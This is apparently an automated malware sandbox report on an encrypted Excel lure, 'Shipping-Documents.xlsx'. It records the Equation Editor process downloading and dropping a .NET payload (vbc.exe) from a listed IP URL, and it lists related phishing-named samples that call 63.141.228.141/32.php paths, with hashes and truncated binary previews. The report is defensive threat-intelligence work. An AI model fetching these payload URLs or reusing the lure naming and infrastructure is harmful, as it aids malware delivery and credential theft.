Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@6/20@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 30% (good quality ratio 28.7%)
• Quality average: 76.7%
• Quality standard deviation: 29%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
12:29:11 | API Interceptor | 93x Sleep call for process: EQNEDT32.EXE modified
12:29:15 | API Interceptor | 72x Sleep call for process: vbc.exe modified

                            Joe Sandbox View / Context

                            IPs

Match: 63.141.228.141

Associated Sample Name / URL | Detection | Context
Detalles del pago.pdf___________________________________________________.exe | malicious | 63.141.228.141/32.php/hGVMLp0uMVSWM
RFQ No3756368.exe | malicious | 63.141.228.141/32.php/nuldTOn9SBn3G
Proforma Invoice.exe | malicious | 63.141.228.141/32.php/cViU8nooOLcrF
DHL Receipt_AWB#600595460.exe | malicious | 63.141.228.141/32.php/tv9F9tOWmL3Dq
TDF9XB01IbjiGuv.exe | malicious | 63.141.228.141/32.php/qB0GQ2GKLyuOU
quote.exe | malicious | 63.141.228.141/32.php/GsoXa3yQ3p8IH
Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141/32.php/S7zr5v1fXI3Rb
#U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141/32.php/S7zr5v1fXI3Rb
Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141/32.php/S7zr5v1fXI3Rb
jO8Tn2nYdJ.exe | malicious | 63.141.228.141/32.php/3LJAZguIGMmJV
socdkv9RSS.exe | malicious | 63.141.228.141/32.php/3bi7icv31dccw
Estatment.exe | malicious | 63.141.228.141/32.php/5l0ZnNa7AB6Dl
Proforma_Valid_Prices_Order no.0193884_doc.exe | malicious | 63.141.228.141/32.php/3LJAZguIGMmJV
SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exe | malicious | 63.141.228.141/32.php/NtbXO1knHRe3C
TNT Shipment Documents.exe | malicious | 63.141.228.141/32.php/tv9F9tOWmL3Dq
QUOTE 1B001.exe | malicious | 63.141.228.141/32.php/cUubrzlDZTTbS
DOC.022000109530000.pdf.exe | malicious | 63.141.228.141/32.php/fw2pM7fnRpMCI
detalles de la transferencia.pdf.exe | malicious | 63.141.228.141/32.php/fw2pM7fnRpMCI
XpQz54zQrMpkJxs.exe | malicious | 63.141.228.141/32.php/NtbXO1knHRe3C
DxMkM6DOH7.exe | malicious | 63.141.228.141/32.php/kMB4F28c3jZI6

                            Domains

                            No context

                            ASN

Match: NOCIXUS

Associated Sample Name / URL | Detection | Context
Detalles del pago.pdf___________________________________________________.exe | malicious | 63.141.228.141
RFQ No3756368.exe | malicious | 63.141.228.141
Proforma Invoice.exe | malicious | 63.141.228.141
DHL Receipt_AWB#600595460.exe | malicious | 63.141.228.141
TDF9XB01IbjiGuv.exe | malicious | 63.141.228.141
invoice_sh.html | malicious | 63.141.243.99
quote.exe | malicious | 63.141.228.141
Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141
#U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141
Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exe | malicious | 63.141.228.141
jO8Tn2nYdJ.exe | malicious | 63.141.228.141
socdkv9RSS.exe | malicious | 63.141.228.141
Estatment.exe | malicious | 63.141.228.141
Proforma_Valid_Prices_Order no.0193884_doc.exe | malicious | 63.141.228.141
SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exe | malicious | 63.141.228.141
TNT Shipment Documents.exe | malicious | 63.141.228.141
QUOTE 1B001.exe | malicious | 63.141.228.141
DOC.022000109530000.pdf.exe | malicious | 63.141.228.141
detalles de la transferencia.pdf.exe | malicious | 63.141.228.141
XpQz54zQrMpkJxs.exe | malicious | 63.141.228.141

Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Associated Sample Name / URL | Detection | Context
Seafood Order and Company Profile.xlsx | malicious | 103.133.109.192
RFQ.exe | malicious | 103.140.250.132
NEW ORDER.xlsx | malicious | 103.140.251.225
Purchase Contract.jar | malicious | 103.133.104.124
Booking.pdf.exe | malicious | 103.140.250.132
DHL_June 2021 at 11M_9BZ7290_PDF.exe | malicious | 103.133.109.176
Spec Design.exe | malicious | 180.214.238.96
YEj2a2f6ai.exe | malicious | 103.114.104.219
Purchase Contract.jar | malicious | 103.133.104.124
M113461.exe | malicious | 103.89.91.38
Draft HUD.jar | malicious | 103.133.104.124
MV SHUHA QUEEN.docx | malicious | 103.133.106.72
MV SHUHA QUEEN.docx | malicious | 103.133.106.72
8KfPvyojv5.exe | malicious | 103.149.13.196
vpUOv3498p.exe | malicious | 103.133.109.176
9n7miZydYC.exe | malicious | 103.133.106.117
NEW ORDER Ref PO-298721.doc | malicious | 103.133.106.117
2-2.exe | malicious | 103.114.107.28
3-1.exe | malicious | 103.114.107.28
2-3.exe | malicious | 103.114.107.28

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 761856
Entropy (8bit): 7.601403838460658
Encrypted: false
SSDEEP: 12288:88zqLMOeSMxvquwaHpCwQqc6n2R8Uncvc6t8TSx+f5SSruwsr4Z4:zOgfquPHpCwQqRTTt88KSKNsrJ
MD5: 7146B0D2CAED6422C289A08F63A5C685
SHA1: 2666D058EA4E4A2CA5BC6E5EA75594E68FC63F1B
SHA-256: 25AA6393CACFF94544387CC515F754DFD2AF133612A74FD84B64C6E17354D1ED
SHA-512: F0B3098F20A22095397AB88348ECFE0911B126739005C9B70A815543BE04465603D3ED0C070BA50488C88FE13B9470D003C114254941593BA20F4511CB01CC47
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 11%
Reputation: low
IE Cache URL: http://103.89.90.94/pzldoc/regasm.exe
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.`................................ ........@.. ....................................@.....................................K.......,...........................?................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........&..h...........P,.............................................j+.&.(....(....(.....o....*..0..........+.&.+.&. .....9S...&..(....8....& ....8;.....(.... ....8*.....(.... ....8......(....8.... ............E................................/... ....(....:....&..(.....(....9s...& .....9....&*.V+.&..(....(....(....*..V+.&..(....o#...(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o!...*.J+.&....
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AE5E43D.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):50311
                            Entropy (8bit):7.960958863022709
                            Encrypted:false
                            SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                            MD5:4141C7515CE64FED13BE6D2BA33299AA
                            SHA1:B290F533537A734B7030CE1269AC8C5398754194
                            SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                            SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32420706.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):84203
                            Entropy (8bit):7.979766688932294
                            Encrypted:false
                            SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                            MD5:208FD40D2F72D9AED77A86A44782E9E2
                            SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                            SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                            SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4091E51A.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                            Category:dropped
                            Size (bytes):8815
                            Entropy (8bit):7.944898651451431
                            Encrypted:false
                            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                            MD5:F06432656347B7042C803FE58F4043E1
                            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A2D31B2.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):51166
                            Entropy (8bit):7.767050944061069
                            Encrypted:false
                            SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                            MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                            SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                            SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                            SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63F24961.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):7592
                            Entropy (8bit):5.455885888544303
                            Encrypted:false
                            SSDEEP:96:znp5cqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwO:bp2STxK/LA/FVoL3QtKhn+e3+wO
                            MD5:F90940F79806885D4D1066FF87C79506
                            SHA1:4292293781E28C72F1BD8D888A87E99F70EABFB3
                            SHA-256:0BC0CE96702BEBFC824C0957DDB9193BA5AC80E7D9600F73DA1F055401D77EBF
                            SHA-512:5B2D5FABEDDEAE601F9EADAE8D0AC88255111ADF3B9E53C9B6CC45CFE1B042ED14E7942C82A440EEA85F9B11E27FBD930FB934505EC8E26DB78B182296196E6A
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BC1535.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):79394
                            Entropy (8bit):7.864111100215953
                            Encrypted:false
                            SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                            MD5:16925690E9B366EA60B610F517789AF1
                            SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                            SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                            SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79991ED9.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):49744
                            Entropy (8bit):7.99056926749243
                            Encrypted:true
                            SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                            MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                            SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                            SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                            SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\826EFC38.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):51166
                            Entropy (8bit):7.767050944061069
                            Encrypted:false
                            SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                            MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                            SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                            SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                            SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BBCBF4F.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):50311
                            Entropy (8bit):7.960958863022709
                            Encrypted:false
                            SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                            MD5:4141C7515CE64FED13BE6D2BA33299AA
                            SHA1:B290F533537A734B7030CE1269AC8C5398754194
                            SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                            SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6AB76E0.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):648132
                            Entropy (8bit):2.8124530118203914
                            Encrypted:false
                            SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                            MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                            SHA1:F677467423105ACF39B76CB366F08152527052B3
                            SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                            SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7035FEE.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):7608
                            Entropy (8bit):5.085491918831368
                            Encrypted:false
                            SSDEEP:96:+Sp5LSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5pW+sW31RGtdVDYM3VfmkpH
                            MD5:332C0E448848C1DCFAC18AAA237E2151
                            SHA1:319D4EBF0024ED92F0424C6BF949EACD22236441
                            SHA-256:F1CB1DBD79CC21483BBCD58E689B95C4F0EDACEDD6F1E3239F655C6529718682
                            SHA-512:8607DFBDF76369D68CAD592CCFB79FFA55FFD472E83B2D30D9AF9B5B56E8D2B5E2964EF885090A2ABA02310EC425D0617BC2D7BCEB1E70715095F507F6512DAD
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C83AFE53.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):79394
                            Entropy (8bit):7.864111100215953
                            Encrypted:false
                            SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                            MD5:16925690E9B366EA60B610F517789AF1
                            SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                            SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                            SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1A2B317.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):49744
                            Entropy (8bit):7.99056926749243
                            Encrypted:true
                            SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                            MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                            SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                            SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                            SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5DD422C.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):84203
                            Entropy (8bit):7.979766688932294
                            Encrypted:false
                            SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                            MD5:208FD40D2F72D9AED77A86A44782E9E2
                            SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                            SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                            SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB863104.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                            Category:dropped
                            Size (bytes):8815
                            Entropy (8bit):7.944898651451431
                            Encrypted:false
                            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                            MD5:F06432656347B7042C803FE58F4043E1
                            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                            Malicious:false
                            C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                            Process:C:\Users\Public\vbc.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview: 1
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):598
                            Entropy (8bit):0.6390116820665388
                            Encrypted:false
                            SSDEEP:3:/lbWwWvllbWwWvllbWwWvllbWwWvllbWwWvllbWwWvllbWwWl:seeeeeeZ
                            MD5:E34D74806A224083D4011C3BED51D210
                            SHA1:5F801AC445BAB225AD54C6875B1CAA13DC64BAD8
                            SHA-256:36B1C45B1C4DF82A82C9F6E40AE8746549ECF0957E92FD968516ECD4BA57C45F
                            SHA-512:E88FF1C1159BA47052C5889A9CCC1F0385877515E66695D91F8FD7541007D643E031B22AA18B429B303A271E848DBD74017625666A1D303C04544D01B8C975D3
                            Malicious:false
                            Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.
                            C:\Users\user\Desktop\~$Shipping-Documents.xlsx
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):1.4377382811115937
                            Encrypted:false
                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                            Malicious:true
                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            C:\Users\Public\vbc.exe
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):761856
                            Entropy (8bit):7.601403838460658
                            Encrypted:false
                            SSDEEP:12288:88zqLMOeSMxvquwaHpCwQqc6n2R8Uncvc6t8TSx+f5SSruwsr4Z4:zOgfquPHpCwQqRTTt88KSKNsrJ
                            MD5:7146B0D2CAED6422C289A08F63A5C685
                            SHA1:2666D058EA4E4A2CA5BC6E5EA75594E68FC63F1B
                            SHA-256:25AA6393CACFF94544387CC515F754DFD2AF133612A74FD84B64C6E17354D1ED
                            SHA-512:F0B3098F20A22095397AB88348ECFE0911B126739005C9B70A815543BE04465603D3ED0C070BA50488C88FE13B9470D003C114254941593BA20F4511CB01CC47
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 11%
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.`................................ ........@.. ....................................@.....................................K.......,...........................?................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........&..h...........P,.............................................j+.&.(....(....(.....o....*..0..........+.&.+.&. .....9S...&..(....8....& ....8;.....(.... ....8*.....(.... ....8......(....8.... ............E................................/... ....(....:....&..(.....(....9s...& .....9....&*.V+.&..(....(....(....*..V+.&..(....o#...(....*...+.&..*..+.&..*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*.J+.&.........(....*..+.&..(....*:+.&.....o!...*.J+.&....

                            Static File Info

                            General

                            File type:CDFV2 Encrypted
                            Entropy (8bit):7.995662263943651
                            TrID:
                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                            File name:Shipping-Documents.xlsx
                            File size:1359872
                            MD5:20e540ed9d02f60f7fb928ed8fe60f1f
                            SHA1:afa6c289fbeed004fe3a52c666cf32a8ae444e79
                            SHA256:3c48a312d69b2d72bec8b3dad17e99ee1241afff875e97b73569509d5f8b07ec
                            SHA512:1f1aed88494f999628457d75b3f1097bd1b05c48610ce09c96e827a34c1f81f8ef40a46027404cc050545258dfc290fd024923a73bd880019d95bbec27035fb5
                            SSDEEP:24576:dHM2lbcLvEgwCf3okSoDsM0J+MC0MhXWc3zfSl2dz5QEYLiHjlkIh5cM07ZP:d2Lcgws3eooMQ+zNhGaza85Jlk018x
                            File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                            File Icon

                            Icon Hash:e4e2aa8aa4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "Shipping-Documents.xlsx"

                            Indicators

                            Has Summary Info:False
                            Application Name:unknown
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:False

                            Streams

                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                            General
                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                            File Type:data
                            Stream Size:64
                            Entropy:2.73637206947
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                            General
                            Stream Path:\x6DataSpaces/DataSpaceMap
                            File Type:data
                            Stream Size:112
                            Entropy:2.7597816111
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
